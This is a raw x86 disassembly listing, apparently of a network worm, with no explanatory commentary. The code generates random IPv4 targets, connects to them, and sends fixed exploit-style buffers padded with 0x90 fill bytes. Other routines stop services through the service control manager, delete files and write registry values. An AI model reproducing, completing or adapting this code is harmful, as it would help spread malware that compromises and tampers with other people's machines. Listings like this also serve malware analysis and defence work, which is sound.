movsx edi, dl
shl edi, 1
add edi, 9
mov edx, edi
mov [ebp+var_89E3], dl
push 1
lea eax, [ebp+var_89E3]
push eax
lea eax, [ebp+var_300F]
push eax
call sub_4408C9
mov eax, [ebp+arg_4]
mov [ebp+var_3058], eax
push 0E29h
push 31h
lea eax, [ebp+var_4039]
push eax
call sub_4408D5
add esp, 48h
push 10h
lea eax, [ebp+var_304C]
push eax
call sub_440761
mov [ebp+var_304C], 2
movsx eax, [ebp+var_89E2]
movzx eax, ax
push eax
call sub_440585
mov edi, eax
mov [ebp+var_304A], di
mov eax, [ebp+arg_0]
mov [ebp+var_3048], eax
push 10h
lea eax, [ebp+var_304C]
push eax
push [ebp+var_54]
call sub_440561
cmp eax, 0FFFFFFFFh
jnz short loc_43F8F8
mov [ebp+var_3054], 2
jmp loc_43FD73
; ---------------------------------------------------------------------------
loc_43F8F8: ; CODE XREF: sub_43F725+1C2�j
push 64h
call sub_44076D
push 0
push 89h
push offset loc_404313
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0A8h
push 40439Dh
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0DEh
push 404446h
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
mov eax, [ebp+var_80]
cmp eax, 0FFFFFFFFh
jz short loc_43F9D2
cmp eax, 46h
jge short loc_43F9D7
loc_43F9D2: ; CODE XREF: sub_43F725+2A6�j
jmp loc_43FD69
; ---------------------------------------------------------------------------
loc_43F9D7: ; CODE XREF: sub_43F725+2AB�j
lea eax, [ebp+var_2F83]
mov [ebp+var_89E8], eax
cmp byte ptr [eax], 31h
setnz al
and eax, 1
mov [ebp+var_3050], eax
jz loc_43FAEB
push 0DACh
push 90h
lea eax, [ebp+var_2987]
push eax
call sub_4408D5
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_21A3]
push eax
call sub_4408C9
push [ebp+arg_8]
push [ebp+var_3058]
lea eax, [ebp+var_2193]
push eax
call sub_4408C9
push 4
push 404D55h
lea eax, [ebp+var_1E6F]
push eax
call sub_4408C9
push 4
imul eax, [ebp+var_3050], 3Ch
lea eax, ds:404938h[eax]
push eax
lea eax, [ebp+var_1E6B]
push eax
call sub_4408C9
push [ebp+var_3058]
call sub_440785
push eax
push [ebp+var_3058]
lea edi, [ebp+var_1E5F]
push edi
call sub_4408C9
add esp, 48h
xor ebx, ebx
loc_43FA93: ; CODE XREF: sub_43F725+38B�j
mov dl, [ebp+ebx+var_2987]
mov [ebp+ebx*2+var_1BDA], dl
mov [ebp+ebx*2+var_1BD9], 0
inc ebx
cmp ebx, 0DACh
jl short loc_43FA93
mov [ebp+var_82], 0
mov [ebp+var_81], 0
push 1C52h
push 31h
lea eax, [ebp+var_89D8]
push eax
call sub_4408D5
push 1C52h
push 31h
lea eax, [ebp+var_6112]
push eax
call sub_4408D5
add esp, 18h
jmp short loc_43FB4D
; ---------------------------------------------------------------------------
loc_43FAEB: ; CODE XREF: sub_43F725+2CD�j
push 7D0h
push 90h
lea eax, [ebp+var_68E2]
push eax
call sub_4408D5
push [ebp+var_3058]
call sub_440785
push eax
push [ebp+var_3058]
lea edi, [ebp+var_6842]
push edi
call sub_4408C9
lea eax, [ebp+var_89E0]
push eax
call sub_440785
push eax
lea edi, [ebp+var_89E0]
push edi
lea edi, [ebp+var_6126]
push edi
call sub_4408C9
add esp, 24h
mov eax, dword ptr loc_404937+1
mov [ebp+var_6136], eax
loc_43FB4D: ; CODE XREF: sub_43F725+3C4�j
push 0
movsx eax, [ebp+var_403A]
add eax, 4
push eax
lea eax, [ebp+var_303C]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 68h
push offset loc_404586
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0A0h
push offset loc_4045EF
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
cmp [ebp+var_3050], 0
jz loc_43FCF5
push 68h
push offset loc_40479E
lea eax, [ebp+var_89D8]
push eax
call sub_4408C9
push 1B5Ah
lea eax, [ebp+var_1BDA]
push eax
lea eax, [ebp+var_8970]
push eax
call sub_4408C9
push 70h
push offset loc_404807
lea eax, [ebp+var_6112]
push eax
call sub_4408C9
push 0A5Eh
lea eax, [ebp+var_B46]
push eax
lea eax, [ebp+var_60A2]
push eax
call sub_4408C9
push 84h
push 404878h
lea eax, [ebp+var_55DE]
push eax
call sub_4408C9
add esp, 3Ch
push 0
push 10FCh
lea eax, [ebp+var_89D8]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
push 64h
call sub_44076D
push 0
push 640h
lea eax, [ebp+var_2FC7]
push eax
push [ebp+var_54]
call sub_4405B5
mov [ebp+var_80], eax
cmp eax, 0FFFFFFFFh
jz loc_43FD69
push 0
push 0FDCh
lea eax, [ebp+var_6112]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short loc_43FD5B
jmp short loc_43FD5B
; ---------------------------------------------------------------------------
loc_43FCF5: ; CODE XREF: sub_43F725+4FA�j
push 7Ch
push 404690h
lea eax, [ebp+var_4039]
push eax
call sub_4408C9
push 7D0h
lea eax, [ebp+var_68E2]
push eax
lea eax, [ebp+var_3FBD]
push eax
call sub_4408C9
push 90h
push offset loc_40470D
lea eax, [ebp+var_37ED]
push eax
call sub_4408C9
add esp, 24h
mov [ebp+var_3342], 0
push 0
push 0CF8h
lea eax, [ebp+var_4039]
push eax
push [ebp+var_54]
call sub_4405C1
cmp eax, 0FFFFFFFFh
jnz short $+2
loc_43FD5B: ; CODE XREF: sub_43F725+5CC�j
; sub_43F725+5CE�j
push 64h
call sub_44076D
and [ebp+var_3054], 0
loc_43FD69: ; CODE XREF: sub_43F725+216�j
; sub_43F725+258�j ...
push 2
push [ebp+var_54]
call sub_4405CD
loc_43FD73: ; CODE XREF: sub_43F725+1CE�j
push [ebp+var_54]
call sub_440555
loc_43FD7B: ; CODE XREF: sub_43F725+53�j
mov eax, [ebp+var_3054]
pop edi
pop esi
pop ebx
leave
retn
sub_43F725 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43FD86 proc near ; CODE XREF: .text:loc_43FDFA�p
var_32 = byte ptr -32h
push ebp
mov ebp, esp
sub esp, 34h
push esi
push edi
push 31h
lea eax, [ebp+var_32]
push eax
call sub_440579
cmp eax, 0FFFFFFFFh
jnz short loc_43FDA2
xor eax, eax
jmp short loc_43FDBC
; ---------------------------------------------------------------------------
loc_43FDA2: ; CODE XREF: sub_43FD86+16�j
lea eax, [ebp+var_32]
push eax
call sub_44056D
mov edi, eax
or edi, edi
jnz short loc_43FDB5
xor eax, eax
jmp short loc_43FDBC
; ---------------------------------------------------------------------------
loc_43FDB5: ; CODE XREF: sub_43FD86+29�j
mov eax, [edi+0Ch]
mov esi, [eax]
mov eax, [esi]
loc_43FDBC: ; CODE XREF: sub_43FD86+1A�j
; sub_43FD86+2D�j
pop edi
pop esi
leave
retn
sub_43FD86 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
call sub_4406F5
push eax
call sub_440911
mov esi, 254h
mov eax, esi
add eax, 0Ah
push eax
push 0
call sub_440731
mov ebx, eax
push esi
push 4040BFh
push ebx
call sub_4408C9
add esp, 10h
loc_43FDFA: ; CODE XREF: .text:0043FE14�j
; .text:0043FE4E�j ...
call sub_43FD86
mov [ebp-10Ch], eax
or eax, eax
jnz short loc_43FE16
push 384h
call sub_4408B1
pop ecx
jmp short loc_43FDFA
; ---------------------------------------------------------------------------
loc_43FE16: ; CODE XREF: .text:0043FE07�j
mov al, [ebp-10Ch]
mov [ebp-111h], al
mov al, [ebp-10Bh]
mov [ebp-112h], al
mov al, [ebp-10Ah]
mov [ebp-135h], al
cmp byte ptr [ebp-111h], 7Fh
jnz short loc_43FE50
push 384h
call sub_4408B1
pop ecx
jmp short loc_43FDFA
; ---------------------------------------------------------------------------
loc_43FE50: ; CODE XREF: .text:0043FE41�j
lea eax, [ebp-130h]
push eax
call sub_43F624
push 0
call sub_4408B1
add esp, 8
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_4408ED
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_4408ED
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_43FEED
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
cmp al, 3
jnb short loc_43FEED
mov al, [ebp-135h]
mov [ebp-131h], al
loc_43FEED: ; CODE XREF: .text:0043FEC9�j
; .text:0043FEDF�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_43FF22
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push 404D49h
lea eax, [ebp-130h]
push eax
call sub_440905
add esp, 14h
loc_43FF22: ; CODE XREF: .text:0043FEF4�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_43FF7C
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_43FF7C
cmp al, 21h
jnb short loc_43FF7C
call sub_4408ED
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_43FF62
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_43FF62: ; CODE XREF: .text:0043FF5B�j
mov edi, edx
add edi, 10h
push edi
push 404D3Ch
lea edi, [ebp-130h]
push edi
call sub_440905
add esp, 14h
loc_43FF7C: ; CODE XREF: .text:0043FF2E�j
; .text:0043FF38�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_43FFBC
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_43FFBC
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push offset loc_404D2E
lea eax, [ebp-130h]
push eax
call sub_440905
add esp, 10h
loc_43FFBC: ; CODE XREF: .text:0043FF88�j
; .text:0043FF96�j
lea eax, [ebp-130h]
push eax
call sub_440591
cmp [ebp-10Ch], eax
jz loc_43FDFA
push dword ptr [ebp-10Ch]
call sub_44059D
movzx edi, word ptr loc_404092+2
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_440905
add esp, 10h
loc_43FFFC: ; CODE XREF: .text:00440025�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_440005: ; CODE XREF: .text:0044000A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440005
cmp eax, 19h
jz short loc_440027
push 404D25h
lea eax, [ebp-0FFh]
push eax
call sub_44091D
add esp, 8
jmp short loc_43FFFC
; ---------------------------------------------------------------------------
loc_440027: ; CODE XREF: .text:0044000F�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_440030: ; CODE XREF: .text:00440035�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440030
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_4408C9
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_440591
push esi
push ebx
push eax
call sub_43F725
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_4408B1
add esp, 4
jmp loc_43FDFA
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440080 proc near ; CODE XREF: .text:004400C2�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_440701
cmp eax, 80000000h
jb short loc_440097
mov eax, 3Ch
jmp short locret_4400B8
; ---------------------------------------------------------------------------
loc_440097: ; CODE XREF: sub_440080+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_4405E5
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_4400B3
mov eax, 12Ch
jmp short locret_4400B8
; ---------------------------------------------------------------------------
loc_4400B3: ; CODE XREF: sub_440080+2A�j
mov eax, 64h
locret_4400B8: ; CODE XREF: sub_440080+15�j
; sub_440080+31�j
leave
retn
sub_440080 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_440080
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push 401565h
push 0
push 0
call sub_440791
push eax
call sub_4406E9
xor esi, esi
jmp short loc_44011B
; ---------------------------------------------------------------------------
loc_4400E9: ; CODE XREF: .text:0044011D�j
lea eax, [ebp-4]
push eax
push 0
push 0
push 401E23h
push 0
push 0
call sub_440791
push eax
call sub_4406E9
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_4408B1
pop ecx
inc esi
loc_44011B: ; CODE XREF: .text:004400E7�j
cmp esi, ebx
jb short loc_4400E9
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440126 proc near ; CODE XREF: sub_4403F5+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, loc_404A2F+9
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_440149: ; CODE XREF: sub_440126+211�j
push 0F003Fh
push 0
push 0
call sub_440839
mov [ebp+var_28], eax
or eax, eax
jz loc_440330
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_440845
mov ebx, eax
or eax, eax
jz loc_440328
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_440821
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_4401A1: ; CODE XREF: sub_440126+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_440821
or eax, eax
jz short loc_4401B7
cmp [ebp+var_1C], 1
jnz short loc_4401B9
loc_4401B7: ; CODE XREF: sub_440126+89�j
jmp short loc_4401CC
; ---------------------------------------------------------------------------
loc_4401B9: ; CODE XREF: sub_440126+8F�j
push 3E8h
call sub_44076D
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_4401A1
loc_4401CC: ; CODE XREF: sub_440126:loc_4401B7�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_4401EA
push ebx
call sub_44082D
loc_4401EA: ; CODE XREF: sub_440126+BC�j
push ebx
call sub_440815
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_440328
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_4402B0
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_4405F1
or eax, eax
jz short loc_4402B0
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_440249: ; CODE XREF: sub_440126+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440249
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_44027D
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_44027D
push 404BA0h
lea eax, [ebp+var_36C]
push eax
call sub_44091D
add esp, 8
loc_44027D: ; CODE XREF: sub_440126+131�j
; sub_440126+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_44091D
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_44079D
loc_4402B0: ; CODE XREF: sub_440126+FE�j
; sub_440126+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_440328
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_440875
or eax, eax
jnz short loc_440328
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_440851
push [ebp+var_4]
call sub_440869
loc_440328: ; CODE XREF: sub_440126+62�j
; sub_440126+E0�j ...
push [ebp+var_28]
call sub_440815
loc_440330: ; CODE XREF: sub_440126+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_440149
pop edi
pop esi
pop ebx
leave
retn 4
sub_440126 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_4403D2
jg short loc_44035F
cmp eax, 2
jz short loc_4403C9
jmp loc_4403DF
; ---------------------------------------------------------------------------
loc_44035F: ; CODE XREF: .text:00440353�j
cmp eax, 113h
jnz short loc_4403DF
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push offset loc_404B85
push 80000001h
call sub_43F364
mov eax, dword ptr loc_404097+1
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push offset loc_404B85
push 80000001h
call sub_43F2F9
add esp, 30h
push 0
push 404098h
call sub_440719
jmp short loc_4403F0
; ---------------------------------------------------------------------------
loc_4403C9: ; CODE XREF: .text:00440358�j
push 0
call sub_4407E5
jmp short loc_4403F0
; ---------------------------------------------------------------------------
loc_4403D2: ; CODE XREF: .text:00440351�j
push dword ptr loc_402FFF+1
call sub_4407FD
jmp short loc_4403F0
; ---------------------------------------------------------------------------
loc_4403DF: ; CODE XREF: .text:0044035A�j
; .text:00440364�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_440809
loc_4403F0: ; CODE XREF: .text:004403C7�j
; .text:004403D0�j ...
pop edi
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4403F5 proc near ; CODE XREF: sub_4405FD+5C�p
var_2DC = byte ptr -2DCh
var_2D8 = byte ptr -2D8h
var_148 = dword ptr -148h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2DCh
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_8]
push offset loc_403010
call sub_440681
push 404B7Ch
lea eax, [ebp+var_143]
push eax
call sub_440905
and [ebp+var_44], 0
lea eax, loc_4023A7
mov [ebp+var_40], eax
and [ebp+var_3C], 0
and [ebp+var_38], 0
mov [ebp+var_34], edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
lea eax, [ebp+var_143]
mov [ebp+var_20], eax
lea eax, [ebp+var_44]
push eax
call sub_4407B5
push 0
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0CF0000h
push 404D25h
lea eax, [ebp+var_143]
push eax
push 0
call sub_4407F1
mov dword ptr loc_402FFF+1, eax
call sub_4406C5
push eax
call sub_43F2D4
lea eax, [ebp+var_2D8]
push eax
push 2
call sub_440531
push 0
call sub_440126
lea eax, [ebp+var_2DC]
push eax
push 0
push 0
push 40211Dh
push 0
push 0
call sub_440791
push eax
call sub_4406E9
and [ebp+var_148], 0
push 4
push 4
lea eax, [ebp+var_148]
push eax
push 404B81h
push offset loc_404B85
push 80000001h
call sub_43F2F9
add esp, 24h
push 0
push 2710h
push 1
push dword ptr loc_402FFF+1
call sub_4407A9
jmp short loc_440516
; ---------------------------------------------------------------------------
loc_440504: ; CODE XREF: sub_4403F5+132�j
lea eax, [ebp+var_1C]
push eax
call sub_4407CD
lea eax, [ebp+var_1C]
push eax
call sub_4407D9
loc_440516: ; CODE XREF: sub_4403F5+10D�j
push 0
push 0
push 0
lea eax, [ebp+var_1C]
push eax
call sub_4407C1
or eax, eax
jnz short loc_440504
pop edi
leave
retn 10h
sub_4403F5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440531 proc near ; CODE XREF: sub_4403F5+A5�p
jmp dword ptr loc_40524C
sub_440531 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44053D proc near ; CODE XREF: .text:0043F5FB�p
jmp dword ptr loc_40524D+3
sub_44053D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440549 proc near ; CODE XREF: .text:0043F5C8�p
jmp dword ptr loc_40524D+7
sub_440549 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440555 proc near ; CODE XREF: .text:0043F4F6�p
; sub_43F725+651�p
jmp dword ptr loc_405256+2
sub_440555 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440561 proc near ; CODE XREF: sub_43F725+1BA�p
jmp dword ptr loc_405256+6
sub_440561 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44056D proc near ; CODE XREF: sub_43FD86+20�p
jmp dword ptr loc_40525D+3
sub_44056D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440579 proc near ; CODE XREF: sub_43FD86+E�p
jmp dword ptr loc_405263+1
sub_440579 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440585 proc near ; CODE XREF: .text:0043F5B6�p
; sub_43F725+197�p
jmp dword ptr loc_405263+5
sub_440585 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440591 proc near ; CODE XREF: .text:0043FFC3�p
; .text:00440054�p
jmp dword ptr loc_40526B+1
sub_440591 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44059D proc near ; CODE XREF: sub_43F725+63�p
; .text:0043FFDA�p
jmp dword ptr loc_40526E+2
sub_44059D endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405A9 proc near ; CODE XREF: .text:0043F5E6�p
jmp dword ptr loc_405274
sub_4405A9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405B5 proc near ; CODE XREF: .text:0043F3D6�p
; sub_43F725+20B�p ...
jmp dword ptr loc_405275+3
sub_4405B5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405C1 proc near ; CODE XREF: .text:0043F428�p
; .text:0043F464�p ...
jmp dword ptr loc_40527A+2
sub_4405C1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405CD proc near ; CODE XREF: .text:0043F4EE�p
; sub_43F725+649�p
jmp dword ptr loc_40527A+6
sub_4405CD endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405D9 proc near ; CODE XREF: .text:0043F57F�p
; sub_43F725+48�p
jmp dword ptr loc_405281+3
sub_4405D9 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405E5 proc near ; CODE XREF: sub_440080+1D�p
jmp dword ptr loc_40528F+1
sub_4405E5 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405F1 proc near ; CODE XREF: sub_440126+111�p
jmp dword ptr loc_405299+3
sub_4405F1 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4405FD proc near ; CODE XREF: .text:0043F21C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_4406B9
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_440631
push 22h
mov eax, edi
inc eax
push eax
call sub_440929
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_44064C
mov edi, eax
inc edi
jmp short loc_440629
; ---------------------------------------------------------------------------
loc_440628: ; CODE XREF: sub_4405FD+2F�j
inc edi
loc_440629: ; CODE XREF: sub_4405FD+29�j
cmp byte ptr [edi], 20h
jz short loc_440628
jmp short loc_44064C
; ---------------------------------------------------------------------------
loc_440630: ; CODE XREF: sub_4405FD+3E�j
inc edi
loc_440631: ; CODE XREF: sub_4405FD+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_44063D
cmp eax, 20h
jnz short loc_440630
loc_44063D: ; CODE XREF: sub_4405FD+39�j
jmp short loc_440640
; ---------------------------------------------------------------------------
loc_44063F: ; CODE XREF: sub_4405FD+4D�j
inc edi
loc_440640: ; CODE XREF: sub_4405FD:loc_44063D�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_44064C
cmp eax, 20h
jz short loc_44063F
loc_44064C: ; CODE XREF: sub_4405FD+24�j
; sub_4405FD+31�j ...
push 0
call sub_4406DD
push 1
push edi
push 0
push eax
call sub_4403F5
pop edi
leave
retn
sub_4405FD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_440661 proc near ; CODE XREF: sub_43F725+8�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_440662: ; CODE XREF: sub_440661+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_440662
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_440661 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
db 0
; =============== S U B R O U T I N E =======================================
sub_440681 proc near ; CODE XREF: sub_4403F5+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
